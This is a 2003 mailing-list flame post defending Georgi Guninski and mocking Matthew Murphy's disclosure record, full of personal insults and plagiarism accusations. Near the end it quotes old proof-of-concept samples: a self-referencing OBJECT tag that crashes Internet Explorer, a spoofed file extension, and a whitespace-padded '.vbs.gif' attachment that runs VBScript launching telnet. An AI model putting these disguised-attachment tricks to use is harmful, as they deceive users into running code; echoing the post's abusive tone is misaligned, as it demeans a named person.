Message-ID: <200307160045.h6G0jfQh066366@mailserver1.hushmail.com>
From: dhtml at hush.com (dhtml@...h.com)
Subject: GUNINSKI THE SELF-PROMOTER

>
> You may remember that Guninski completely failed to notify the VIM
> development team of security vulnerabilities in its product, and these were
> brought up by a third party on VIM-DEV for the first time.  I would have
> understood CC'ing the major security lists with the post *in addition to*
> vim-dev, as it *is* a public channel.

I certainly don't remember that. Seems Georgi said:

"Vendor status: vim.org and some vendors were notified on Mon, 25 Nov 2002"

After releasing it on Thu, 12 Dec 2002. I think I will believe Georgi's
version. Not yours.



>
> After all, Guninski has not produced an advisory detailing a security
> vulnerability of any kind in a Microsoft product since July 31, 2002, so
> what right does he have to say that trustworthy computing is a flop?
>
> Clearly, Georgi Guninski couldn't get a job, and relying on the Apache 1.3
> descriptor leak (shudders), or perhaps a local command execution bug in
> vim, or worse, a format string in the Ethereal socks dissector, wouldn't get
> him anywhere.  So, he has slanted every story he could get a hold of,
> turning a non-issue of one-month delays into ridiculous, childish, kiddies'
> rhetoric about MS' irresponsibility.  Even funnier is that while he was
> making a major deal out of MS security being unresponsive, he wasn't even
> notifying open-source vendors of security vulnerabilities!


Your transparent and sudden "love affair" with Microsoft and "responsible
disclosure" doesn't fool us Matthew.  It is you that is desperately seeking
employment and the louder you shout, the better chances you think you may
have. Oh Matthew. You turncoat you.


> Also, Bruce Schneier has little or no room to talk, as his "Password Safe"
> tool was unable to keep local passwords safe, let alone a large product
> base of network applications:

Please. You're embarrassing yourself. Matthew Murphy, wannabe virus writer.
Why not skip on back to alt.comp.virus.source.code to try and figure it all
out before taking on Schneier. Matthew, Matthew, Matthew you'd spin around
like a little girl in the vortex of his knowledge should he even fart in
your direction.

HAHAHAHA  sig of the year:

"Bruce Schneier has little or no room to talk"
- MATTHEW MURPHY - CODE RIPPER, JULY 15 2003



> I also ask you to take into account the fact that altering a mindset takes
> time.  Security vulnerabilities were all but ignored in the early days of
> single-user non-networked Win16.  Those early days are the source of some
> of the Win32 message routines implicated in the recent "Shatter" attacks.
>
> Microsoft has had to work against buggy base code, and teams of developers
> who were never taught a bit about security.  Essentially, Microsoft is
> working against its own history.  For a company of Microsoft's size, this
> is not easy.  For all of the work that requires, I'd say that Microsoft is
> doing a damn good job.


Keep it up Matthew, they'll come a recruiting soon enough.

For shits and giggles here are two of Matthew "Bruce Schneier has little
or no room to talk" Murphy's code rips:

1. DoS in Multiple IE Versions (Self-Referenced Directives) Date: 2002-04-20

"The Exploit

    To date, I have discovered 4 points of exploitation to crash the
browser.  My favorite example is this one:

---- [ CRASH.HTM ] ----
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
---- [ CRASH.HTM ] ----

IE dies inside shdocvw.dll with a call stack overflow.
"

Gosh, this was discovered in March 1998 by Abe L. Getchell. Even the
named html is almost the same LoL!

<!--
<html>
<head>
<title></title>
<object data="crashmehtml.html"></object>
</head>
<body>
</body>
</html>
-->

"What I am doing here, is using the "data" attribute of the "object" tag
to reference itself.
This misuse of the object tag causes the browser to go into a loop"

"EXPLORER causes a stack fault in module SHDOCVW.DLL at 016f:7078d692.
  EXPLORER causes a page fault in module SHDOCVW.DLL at 016f:7078d692"

2. Microsoft Outlook Express Spoofable File Extensions Vulnerability
http://www.securityfocus.com/bid/5277 published Jul 20, 2002

You "pinched" ;-) that one from virus writer, Simon Vallor, Outlook GenKit:

    "malware.JPG              .EXE                  .JPG"

Problem there is, Simon pinched it from bugtraq already in the archives
back in August, 2001 which is what his generator was created for.

http://www.securityfocus.com/archive/1/157279/2003-07-13/2003-07-19/2

Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="nicepic.gif






                                .vbs.gif"

set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run("telnet.exe")

Lord alone knows what else you have been helping yourself to Matthew.
No worries there mate, you'll fit in well with Microsoft once they come
a calling
Are you still 14? Seems like ages. But you'll hopefully grow up one day.

Cheers Big Ears! :D

Oh. and p.s. - feel free to help yourself to anything else you might
fancy. "Pad" the resume for Microsoft you see ;-)

!